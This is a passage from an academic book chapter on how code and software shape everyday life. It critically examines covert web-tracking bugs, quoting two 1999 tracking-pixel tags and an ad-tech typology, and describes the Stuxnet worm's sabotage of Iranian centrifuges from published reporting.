This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology, made up of disparate software ecologies, that we inhabit. As such we need to take account of this new computational environment and think about how today we live in a highly mediated, code-based world. That is, we live in a world where computational concepts and ideas are foundational, or ontological, what I call ''computationality''. Here, code and software become the paradigmatic forms of knowing and doing - to the extent that other candidates for this role, such as air, the economy, evolution, the environment, satellites, and so forth, are understood and explained through computational concepts and categories.&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has been highly successful in penetrating more and more into the lifeworld. Digital code/software has created, and continues to create, specific tensions in relation to old media forms, such as the disruption it has produced in the print, music and film industries, as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. It is a potential that is understood as relating to the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate, often theorised as a form of network politics. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is, for example, 427 million Europeans (or 65 percent) use the Internet and more than 9 in 10 European Internet users reading news online (Wauters, 2012). These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; These computational devices, particularly mobile forms, also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life continues to expand driven by the network effects of digital media, if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane (see, for example, Hall, 2011).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences. Code/software are the materialisation of computationality, in that they are the medium through which structural features of computation&amp;amp;nbsp;are realised and mediated. For example, code/software disconnects the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system (see also Parikka, 2012). Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. That is, the material form of code/software is difficult to theorise and understand due to its perceived invisibility or ethereality, yet nonetheless having concrete effects. This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. Although it is useful to note that theorists, such as Frabetti (2010), problematise Hayles' understanding of code, print, and materiality.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, and send various information about the user back to their servers.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999):&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions (see Parry, 2011). Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2012)]] ''Image 1: Display Advertising Technology Landscape (Luma, 2012)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). Although one can see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012).&amp;amp;nbsp; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the newer, and perhaps indicative directions of travel of these new web bugs under development is called [http://www.persianstat.ir/ PersianStat], which claims to keep 'an eye on 1091622 websites': an Iranian web tracking and data analytics website, it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Assocated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm are such that at least thirty people would have been working on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, 417, manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
